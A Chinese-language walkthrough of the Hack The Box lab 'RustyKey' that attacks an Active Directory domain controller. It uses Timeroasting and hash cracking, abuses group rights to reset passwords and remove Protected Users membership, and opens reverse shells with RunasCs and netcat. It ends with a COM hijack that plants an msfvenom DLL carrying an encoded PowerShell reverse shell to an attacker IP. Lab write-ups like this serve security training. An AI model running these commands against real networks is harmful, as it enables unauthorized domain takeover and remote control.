RustyKey

初始账号密码: rr.parker/ 8#t5HE8L!W3A

1. 信息收集

1.1. 端口扫描

PORT      STATE SERVICE          REASON
53/tcp    open  domain           syn-ack ttl 127
88/tcp    open  kerberos-sec     syn-ack ttl 127
135/tcp   open  msrpc            syn-ack ttl 127
139/tcp   open  netbios-ssn      syn-ack ttl 127
389/tcp   open  ldap             syn-ack ttl 127
445/tcp   open  microsoft-ds     syn-ack ttl 127
464/tcp   open  kpasswd5         syn-ack ttl 127
593/tcp   open  http-rpc-epmap   syn-ack ttl 127
636/tcp   open  ldapssl          syn-ack ttl 127
3268/tcp  open  globalcatLDAP    syn-ack ttl 127
3269/tcp  open  globalcatLDAPssl syn-ack ttl 127
5985/tcp  open  wsman            syn-ack ttl 127
9389/tcp  open  adws             syn-ack ttl 127
47001/tcp open  winrm            syn-ack ttl 127
49664/tcp open  unknown          syn-ack ttl 127
49665/tcp open  unknown          syn-ack ttl 127
49666/tcp open  unknown          syn-ack ttl 127
49667/tcp open  unknown          syn-ack ttl 127
49669/tcp open  unknown          syn-ack ttl 127
49670/tcp open  unknown          syn-ack ttl 127
49671/tcp open  unknown          syn-ack ttl 127
49672/tcp open  unknown          syn-ack ttl 127
49673/tcp open  unknown          syn-ack ttl 127
49676/tcp open  unknown          syn-ack ttl 127
49692/tcp open  unknown          syn-ack ttl 127
49737/tcp open  unknown          syn-ack ttl 127

┌──(root㉿kali)-[~/Desktop/htb/season8/RustyKey]
└─# nmap 10.10.11.75 -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49669,49670,49671,49672,49673,49676,49692,49737 -sCV
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-29 01:32 EDT
Nmap scan report for 10.10.11.75
Host is up (0.088s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-06-29 10:11:06Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: rustykey.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: rustykey.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49671/tcp open  msrpc         Microsoft Windows RPC
49672/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  msrpc         Microsoft Windows RPC
49692/tcp open  msrpc         Microsoft Windows RPC
49737/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

┌──(root㉿kali)-[~/Desktop/htb/season8/RustyKey]
└─# cat ports |grep '/tcp' |awk '{print $1}'|cut -d '/' -f1|tr '\n' ','|sed 's/,$//'
53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49669,49670,49671,49672,49673,49676,49692,49737 

┌──(root㉿kali)-[~/Desktop/htb/season8/RustyKey]
└─# nmap 10.10.11.75 -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49669,49670,49671,49672,49673,49676,49692,49737 -sCV
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-29 01:32 EDT
Nmap scan report for 10.10.11.75
Host is up (0.088s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-06-29 10:11:06Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: rustykey.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: rustykey.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49671/tcp open  msrpc         Microsoft Windows RPC
49672/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  msrpc         Microsoft Windows RPC
49692/tcp open  msrpc         Microsoft Windows RPC
49737/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-06-29T10:12:11
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 4h39m04s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 75.42 seconds

先校验一下题目给出的凭证

┌──(root㉿kali)-[~]
└─# nxc ldap 10.10.11.75 -u 'rr.parker' -p '8#t5HE8L!W3A'    
LDAP        10.10.11.75     389    DC               [*] None (name:DC) (domain:rustykey.htb)
LDAP        10.10.11.75     389    DC               [-] rustykey.htb\rr.parker:8#t5HE8L!W3A STATUS_NOT_SUPPORTED
                                                                                                                                                                         
┌──(root㉿kali)-[~]
└─# nxc smb  10.10.11.75 -u 'rr.parker' -p '8#t5HE8L!W3A'   
SMB         10.10.11.75     445    10.10.11.75      [*]  x64 (name:10.10.11.75) (domain:10.10.11.75) (signing:True) (SMBv1:False) (NTLM:False)
SMB         10.10.11.75     445    10.10.11.75      [-] 10.10.11.75\rr.parker:8#t5HE8L!W3A STATUS_NOT_SUPPORTED 

发现登录失败了,提示 NTLM:False,说明目标机器禁用了NTLM 认证

使用kerberos认证测试成功

┌──(root㉿kali)-[~]
└─# nxc smb  10.10.11.75 -u 'rr.parker' -p '8#t5HE8L!W3A' -k            
SMB         10.10.11.75     445    10.10.11.75      [*]  x64 (name:10.10.11.75) (domain:10.10.11.75) (signing:True) (SMBv1:False) (NTLM:False)
SMB         10.10.11.75     445    10.10.11.75      [-] 10.10.11.75\rr.parker:8#t5HE8L!W3A KDC_ERR_WRONG_REALM 
                                                                                                                                                                         
┌──(root㉿kali)-[~]
└─# nxc ldap  10.10.11.75 -u 'rr.parker' -p '8#t5HE8L!W3A' -k
LDAP        10.10.11.75     389    DC               [*] None (name:DC) (domain:rustykey.htb)
LDAP        10.10.11.75     389    DC               [+] rustykey.htb\rr.parker:8#t5HE8L!W3A 

也可以导入
配置一下hosts

10.10.11.75     rustykey.htb dc.rustykey.htb

bloodhound 收集

┌──(root㉿kali)-[~/Desktop/htb/season8/RustyKey]
└─# nxc ldap  10.10.11.75 -u 'rr.parker' -p '8#t5HE8L!W3A' -k --bloodhound -c all  -d rustykey.htb  --dns-server 10.10.11.75
LDAP        10.10.11.75     389    DC               [*] None (name:DC) (domain:rustykey.htb)
LDAP        10.10.11.75     389    DC               [+] rustykey.htb\rr.parker:8#t5HE8L!W3A 
LDAP        10.10.11.75     389    DC               Resolved collection methods: objectprops, dcom, localadmin, container, group, session, acl, psremote, trusts, rdp
LDAP        10.10.11.75     389    DC               Using kerberos auth without ccache, getting TGT
LDAP        10.10.11.75     389    DC               Done in 00M 13S
LDAP        10.10.11.75     389    DC               Compressing output into /root/.nxc/logs/DC_10.10.11.75_2025-06-29_073914_bloodhound.zip

没有找到任何直接的攻击链
但是通过分析,可以筛选出可能是下一步目标的对象
发现域内存在大量的机器用户
Pasted image 20250701134509.png
而且其中有一个机器用户 IT-COMPUTER3 很可疑,因为其他机器的出站访问控制都是0.而他却有6项
Pasted image 20250701134902.png

  • IT-COMPUTER3 用户可以把自己添加到用户组 HELPDESK 中,
  • HELPDESK 组的成员可以对好几个用户进行 ForceChangePassword 操作

并且,其中三个用户还是 REMOTE MANAGEMENT USERS 组成员,可以进行远程登录
Pasted image 20250701135127.png

此外,还发现了一些有价值的用户,如 MM.TURNER,他可以在 DC.RUSTYKEY.HTB 进行RBCD
Pasted image 20250701135429.png
但这肯定不是我们当前的目标,应该是最后获取root的路径之一

还有一个高价值用户 backupadmin,他是属于管理员组的成员
Pasted image 20250701135601.png

2. 横向移动

结合上面的分析,那我们下一步很可能是获取 IT-COMPUTER3$ 用户的权限。
我知道有一种枚举手段很适合当前的情况,

为什么会想到timeroast

  1. 靶机名称叫做 Rustykey 意思是生锈的钥匙, 可能是过时的密码什么的,timeroat利用要求之一就是计算机账号使用了非标准或旧式默认密码
  2. timeroat只能获取到机器账号的hash,很适合当前环境下进行尝试

IPPSEC 向我展示了一种更合理的方式(通过上次更改计算机密码的时间与计算机创建时间是否一致来判断)
通常计算机会在创建时默认创建一个十分复杂的密码,从出题者的角度来说,设置一个timeroast的考点必然需要修改计算机的密码为一个可以被爆破出来的密码。否则是毫无意义的
Pasted image 20260224165814.png
ippsec通过发现创建密码的时间与修改密码时间不一致,判断出这里很可能是timeroat
https://youtu.be/vkbIVr4_ZdE?t=808

2.1. timeroast

┌──(root㉿kali)-[~/…/htb/season8/RustyKey/Timeroast]
└─# python3 timeroast.py 10.10.11.75
1000:$sntp-ms$3cee29dfbcdc366c5c9d0cd27e953e12$1c0111e900000000000a036e4c4f434cec0bd5e51e897488e1b8428bffbfcd0aec0bda6ab699c106ec0bda6ab699e294
1103:$sntp-ms$d9d46c25fc6f896b8868287fa1b866e4$1c0111e900000000000a036e4c4f434cec0bd5e51f575628e1b8428bffbfcd0aec0bda6b6746daafec0bda6b6746fc3d
1104:$sntp-ms$e94f96f97068c1fba1d188aca95fd420$1c0111e900000000000a036e4c4f434cec0bd5e52152aef9e1b8428bffbfcd0aec0bda6b69422e78ec0bda6b69425bc5
1105:$sntp-ms$af79629b8248f5b053f4ff91fc780907$1c0111e900000000000a036e4c4f434cec0bd5e51ebc81fbe1b8428bffbfcd0aec0bda6b6ac499f8ec0bda6b6ac4c08e
1106:$sntp-ms$6dd9da8e7129fbb4af960b5aacf9e81d$1c0111e900000000000a036e4c4f434cec0bd5e5206fb81ee1b8428bffbfcd0aec0bda6b6c77cb12ec0bda6b6c77fbba
1107:$sntp-ms$9ed2b56dd597b5d88decfce3d4c396bd$1c0111e900000000000a036e4c4f434cec0bd5e51de09353e1b8428bffbfcd0aec0bda6b6e013ec4ec0bda6b6e0163ad
1118:$sntp-ms$1cbe7e20162f678abc9fa0c970961089$1c0111e900000000000a036e4c4f434cec0bd5e51fa0b5ede1b8428bffbfcd0aec0bda6b7fa09b15ec0bda6b7fa0c359
1119:$sntp-ms$9d0f1ba81ec3fc23056390a536641264$1c0111e900000000000a036e4c4f434cec0bd5e51fba6846e1b8428bffbfcd0aec0bda6b7fba50c9ec0bda6b7fba75b2
1120:$sntp-ms$9cb4eba806956209232b5bdd261316fe$1c0111e900000000000a036e4c4f434cec0bd5e52118d914e1b8428bffbfcd0aec0bda6b8118b27eec0bda6b8118e9db
1121:$sntp-ms$a45b70e3c9f901ce575cb25fea007b8e$1c0111e900000000000a036e4c4f434cec0bd5e51e963dc4e1b8428bffbfcd0aec0bda6b82aeb158ec0bda6b82aee052
1122:$sntp-ms$8ca7da413399cea53f33acc288a5b79d$1c0111e900000000000a036e4c4f434cec0bd5e5207d749fe1b8428bffbfcd0aec0bda6b8495e686ec0bda6b8496172e
1123:$sntp-ms$5d0c2faf37c4da0d342ae2cbef599650$1c0111e900000000000a036e4c4f434cec0bd5e51e37a8e3e1b8428bffbfcd0aec0bda6b86272a10ec0bda6b86275401
1124:$sntp-ms$602715575db5df815ec6866bb1558bba$1c0111e900000000000a036e4c4f434cec0bd5e51faf31b1e1b8428bffbfcd0aec0bda6b879eb130ec0bda6b879ee02a
1125:$sntp-ms$765ac7d7a6727af434a480b77fc7550b$1c0111e900000000000a036e4c4f434cec0bd5e5216cc5fbe1b8428bffbfcd0aec0bda6b895c3d17ec0bda6b895c711a
1126:$sntp-ms$8bbb3166ec5d7555090b3d526a03f03c$1c0  111e900000000000a036e4c4f434cec0bd5e51ef89ab0e1b8428bffbfcd0aec0bda6b8b00af52ec0bda6b8b00daf1
1127:$sntp-ms$7511677fe9fa4fb633889f3138c169d5$1c0111e900000000000a036e4c4f434cec0bd5e520ae8914e1b8428bffbfcd0aec0bda6b8cb698adec0bda6b8cb6c7a7

此次也可以用 NetExectimeroast 模块

┌──(root㉿kali)-[~/Desktop/htb/season8/RustyKey]
└─# nxc smb 10.10.11.75 -M timeroast                       
SMB         10.10.11.75     445    10.10.11.75      [*]  x64 (name:10.10.11.75) (domain:10.10.11.75) (signing:True) (SMBv1:False) (NTLM:False)
TIMEROAST   10.10.11.75     445    10.10.11.75      [*] Starting Timeroasting...
TIMEROAST   10.10.11.75     445    10.10.11.75      1000:$sntp-ms$d38d5c0b5b3455d0bce308b310a09fd3$1c0111e900000000000a032f4c4f434cec0d3d472cd57009e1b8428bffbfcd0aec0d417a0cd55f42ec0d417a0cd57bc7
TIMEROAST   10.10.11.75     445    10.10.11.75      1105:$sntp-ms$2e8c228e051ccc06e034d8f0ad22a0e6$1c0111e900000000000a03304c4f434cec0d3d472ac3aa0ee1b8428bffbfcd0aec0d417b12b33a54ec0d417b12b35024
TIMEROAST   10.10.11.75     445    10.10.11.75      1103:$sntp-ms$aa4178da7beab82273eef5ba458d5bca$1c0111e900000000000a03304c4f434cec0d3d472e8b37d7e1b8428bffbfcd0aec0d417b12a3bc32ec0d417b12a3d8b7
TIMEROAST   10.10.11.75     445    10.10.11.75      1104:$sntp-ms$bbe9a87e1bc935053aa6094bd829462b$1c0111e900000000000a03304c4f434cec0d3d472adfa79ae1b8428bffbfcd0aec0d417b12cf2dd0ec0d417b12cf4f5e
TIMEROAST   10.10.11.75     445    10.10.11.75      1106:$sntp-ms$03469059c942dfefce4105045a93cc6c$1c0111e900000000000a03304c4f434cec0d3d472afbe843e1b8428bffbfcd0aec0d417b12eb53a0ec0d417b12eb91b3
TIMEROAST   10.10.11.75     445    10.10.11.75      1107:$sntp-ms$a70b513c4df8f351bf5e4d1f031e87cf$1c0111e900000000000a03304c4f434cec0d3d472b009e8be1b8428bffbfcd0aec0d417b12f0281bec0d417b12f047fc
TIMEROAST   10.10.11.75     445    10.10.11.75      1119:$sntp-ms$ee08832a709f0716e5587f0ba6f465eb$1c0111e900000000000a03304c4f434cec0d3d472b2beb40e1b8428bffbfcd0aec0d417b131b808fec0d417b131b8fa8
TIMEROAST   10.10.11.75     445    10.10.11.75      1118:$sntp-ms$70ed9cab854cdc13074d3367cc7a69f6$1c0111e900000000000a03304c4f434cec0d3d472b2a751ee1b8428bffbfcd0aec0d417b131a0a6dec0d417b131a17d9
TIMEROAST   10.10.11.75     445    10.10.11.75      1120:$sntp-ms$9ed64142ff41010eed5710987273f208$1c0111e900000000000a03304c4f434cec0d3d472b43eb11e1b8428bffbfcd0aec0d417b1333764fec0d417b133392d4
TIMEROAST   10.10.11.75     445    10.10.11.75      1123:$sntp-ms$2be50e07a42d664b41e1e3ff068ff481$1c0111e900000000000a03304c4f434cec0d3d472abaa07ae1b8428bffbfcd0aec0d417b16c2bf2cec0d417b16c2dd5f
TIMEROAST   10.10.11.75     445    10.10.11.75      1125:$sntp-ms$6bb91a165db888273806c5063e224205$1c0111e900000000000a03304c4f434cec0d3d472ad63b0ae1b8428bffbfcd0aec0d417b16de5d18ec0d417b16de7494
TIMEROAST   10.10.11.75     445    10.10.11.75      1126:$sntp-ms$7c5e98e59be2a5ff9f474647f2854f87$1c0111e900000000000a03304c4f434cec0d3d472ae2c12ae1b8428bffbfcd0aec0d417b16eae338ec0d417b16eafab5
TIMEROAST   10.10.11.75     445    10.10.11.75      1121:$sntp-ms$b5329e265eb25bea74b381a57bd2288d$1c0111e900000000000a03304c4f434cec0d3d472ab83f77e1b8428bffbfcd0aec0d417b16c05c7cec0d417b16c07c5c
TIMEROAST   10.10.11.75     445    10.10.11.75      1122:$sntp-ms$d0cf0d85336f5421bc9e8de7b1eaca18$1c0111e900000000000a03304c4f434cec0d3d472ad1683de1b8428bffbfcd0aec0d417b16d98394ec0d417b16d9a374
TIMEROAST   10.10.11.75     445    10.10.11.75      1124:$sntp-ms$5dfbb42d0e489ba7db211b7f9af3aeea$1c0111e900000000000a03304c4f434cec0d3d472ae54061e1b8428bffbfcd0aec0d417b16ed5f13ec0d417b16ed79eb
TIMEROAST   10.10.11.75     445    10.10.11.75      1127:$sntp-ms$d140860524488306176e6926aa7e2cb9$1c0111e900000000000a03304c4f434cec0d3d472affb04ee1b8428bffbfcd0aec0d417b1707c9f8ec0d417b1707eb86

去掉前面的数字和冒号,放到文件中,利用hashcat可以批量破解(需要 hashcat最新版本

D:\Downloads\hashcat-6.2.6+1051\hashcat-6.2.6>hashcat hash.txt rockyou.txt --show
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

31300 | MS SNTP | Network Protocol

NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.

$sntp-ms$765ac7d7a6727af434a480b77fc7550b$1c0111e900000000000a036e4c4f434cec0bd5e5216cc5fbe1b8428bffbfcd0aec0bda6b895c3d17ec0bda6b895c711a:Rusty88!

此hash对应的SID是1125,对应的用户名是 IT-COMPUTER3$
Pasted image 20250629161205.png

验证一下

┌──(root㉿kali)-[~/…/season8/RustyKey/Timeroast/extra-scripts]
└─# nxc ldap 10.10.11.75 -u 'IT-COMPUTER3' -p 'Rusty88!' -k 
LDAP        10.10.11.75     389    DC               [*] None (name:DC) (domain:rustykey.htb)
LDAP        10.10.11.75     389    DC               [+] rustykey.htb\IT-COMPUTER3:Rusty88! 

┌──(root㉿kali)-[~/…/season8/RustyKey/Timeroast/extra-scripts]
└─# nxc smb 10.10.11.75 -u 'IT-COMPUTER3$' -p 'Rusty88!' -k
SMB         10.10.11.75     445    10.10.11.75      [*]  x64 (name:10.10.11.75) (domain:10.10.11.75) (signing:True) (SMBv1:False) (NTLM:False)
SMB         10.10.11.75     445    10.10.11.75      [-] 10.10.11.75\IT-COMPUTER3$:Rusty88! KDC_ERR_WRONG_REALM

Pasted image 20250629161312.png

┌──(root㉿kali)-[~/Desktop/htb/season8/RustyKey]
└─# bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k --dc-ip 10.10.11.75 add groupMember 'HELPDESK' 'IT-COMPUTER3$'
[+] IT-COMPUTER3$ added to HELPDESK

Pasted image 20250629163332.png
然后 HELPDESK 组用户可以修改很多用户的密码。我们下一步肯定是获取一个可以远程登录的用户,这里发现这三个用户都可以远程登录
Pasted image 20250701144343.png
但是 GG.ANDERSON 没有启用,所以只能选剩下两个用户进行尝试

这里还发现 ITSUPPORT 组属于 PROTECTED OBJECTS 组,PROTECTED OBJECTS 组又属于 PROTECTED USERS
Pasted image 20250701145615.png

Pasted image 20250629163509.png
此组的成员会有很多的限制,如Kerberos 票证限制,禁用传统的认证协议(如NTLM认证),无法进行委派,不能进行远程交互等等

但是因为 helpdek 组的成员可以对 PROTECTED OBJECTS 组进行AddMember操作,那也可以进行remove操作
Pasted image 20250701150424.png
所以我们可以从 PROTECTED OBJECTS 组中remove掉 IT组SUPPORT组,从而规避受保护组的相关限制,如限制远程登录

2.3. BB.MORGAN

下一步我们修改掉 BB.MORGAN 用户的密码,并且将 IT组PROTECTED OBJECTS 组中remove掉,然后再申请 BB.MORGAN 的TGT,进行kerberos认证的登录

先改密码 并脱离受保护组

┌──(root㉿kali)-[~/Desktop/htb/season8/RustyKey]
└─# bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k --dc-ip 10.10.11.75 set password BB.MORGAN Admin123!
[+] Password changed successfully!
                                                                                                                                                                                                
┌──(root㉿kali)-[~/Desktop/htb/season8/RustyKey]
└─# bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k remove groupMember 'PROTECTED OBJECTS' 'IT'
[-] IT removed from PROTECTED OBJECTS

然后获取 BB.MORGAN 的TGT,方便进行kerberos认证

┌──(root㉿kali)-[~/Desktop/htb/season8/RustyKey]
└─# impacket-getTGT 'RUSTYKEY.HTB/BB.MORGAN:Admin123!'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in BB.MORGAN.ccache

#导入凭证
export KRB5CCNAME=BB.MORGAN.ccache

这里还要配置 /etc/krb5.conf

vim /etc/krb5.conf

#增加以下内容
[realms]
    RUSTYKEY.HTB = {
        kdc = dc.rustykey.htb
        admin_server = dc.rustykey.htb
    }

[domain_realm]
    .rustykey.htb = RUSTYKEY.HTB
    rustykey.htb = RUSTYKEY.HTB

然后远程登录

┌──(root㉿kali)-[~/Desktop/htb/season8/RustyKey]
└─# evil-winrm -i dc.rustykey.htb -r RUSTYKEY.HTB
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\bb.morgan\Documents> cd ../desktop
*Evil-WinRM* PS C:\Users\bb.morgan\desktop> ls


    Directory: C:\Users\bb.morgan\desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         6/4/2025   9:15 AM           1976 internal.pdf
-ar---        6/30/2025   1:38 PM             34 user.txt

用户桌面发现 internal.pdf
Pasted image 20250701152458.png

直接叫GPT帮我们分析
Pasted image 20250701152903.png
Pasted image 20250701153156.png
大致意思就是给 SUPPORT 组的用户归档功能相关的拓展权限,如可以修改相关的注册表等。

下一步我们应该需要获取一下这个 SUPPORT 组的用户 EE.REED,然后利用这个拓展权限干坏事
Pasted image 20250701153333.png

2.4. RunasCS 上线 EE.REED

利用RunasCS切换到 EE.REED 用户
Pasted image 20250630235918.png
先利用 HELPDESK 组的用户, 修改 EE.REED 的密码

┌──(root㉿kali)-[~]
└─# bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k --dc-ip 10.10.11.75 set password EE.REED Admin123!
[+] Password changed successfully!

此外还要让 SUPPORT 组脱离 PROTECTED OBJECTS
Pasted image 20250701000337.png

┌──(root㉿kali)-[~/Desktop/BloodHound]
└─# bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k remove groupMember 'PROTECTED OBJECTS' 'SUPPORT'
[-] SUPPORT removed from PROTECTED OBJECTS

使用RunasCS 先测试一下,是否可以使用 ee.reed 用户执行命令

*Evil-WinRM* PS C:\Users\bb.morgan\Documents> .\RunasCS.exe ee.reed Admin123! "cmd /c whoami"
[*] Warning: User profile directory for user ee.reed does not exists. Use --force-profile if you want to force the creation.
[*] Warning: The logon for user 'ee.reed' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.

rustykey\ee.reed

然后反弹shell (建议这几步在短时间内连续执行)

#修改密码
┌──(root㉿kali)-[~/Desktop/BloodHound]
└─# bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k --dc-ip 10.10.11.75 set password EE.REED Admin123!
[+] Password changed successfully!
                                                                                          
#脱离受保护组
┌──(root㉿kali)-[~/Desktop/BloodHound]
└─# bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k remove groupMember 'PROTECTED OBJECTS' 'SUPPORT'
[-] SUPPORT removed from PROTECTED OBJECTS

#开启监听
┌──(root㉿kali)-[~]
└─# rlwrap nc -lnvp 6666
listening on [any] 6666 ...

#RunasCS反弹shell
*Evil-WinRM* PS C:\windows\Temp> .\RunasCS.exe ee.reed Admin123! powershell.exe -r 10.10.14.46:6666
[*] Warning: User profile directory for user ee.reed does not exists. Use --force-profile if you want to force the creation.
[*] Warning: The logon for user 'ee.reed' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-39ffe$\Default
[+] Async process 'C:\Windows\system32\cmd.exe' with pid 3248 created in background.

然后你就可以获取到 ee.reed 用户的shell

┌──(root㉿kali)-[~]
└─# rlwrap nc -lnvp 6666
listening on [any] 6666 ...
connect to [10.10.14.46] from (UNKNOWN) [10.10.11.75] 63944
Microsoft Windows [Version 10.0.17763.7434]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
rustykey\ee.reed

2.5. COM劫持

COM Hijacking
参考文章

*Evil-WinRM* PS C:\Users\bb.morgan\Documents> Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* |
    Select-Object DisplayName, DisplayVersion, Publisher, InstallDate |
    Where-Object { $_.DisplayName } |
    Sort-Object DisplayName

DisplayName                                                    DisplayVersion  Publisher             InstallDate
-----------                                                    --------------  ---------             -----------
7-Zip 24.09 (x64)                                              24.09           Igor Pavlov
Microsoft Visual C++ 2022 X64 Additional Runtime - 14.36.32532 14.36.32532     Microsoft Corporation 20241226
Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.36.32532    14.36.32532     Microsoft Corporation 20241226
VMware Tools                                                   12.4.5.23787635 VMware, Inc.          20241226

msfvenom -p windows/x64/exec CMD='powershell.exe -nop -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4ANAA2ACIALAA0ADQANgA2ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==' EXITFUNC=none -f dll > 4466.dll

rlwrap nc -lnvp 4466 

$targetCLSID = 'HKLM:\Software\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32'

Set-ItemProperty -Path $targetCLSID -Name '(default)' -Value 'C:\tmp\4466.dll'
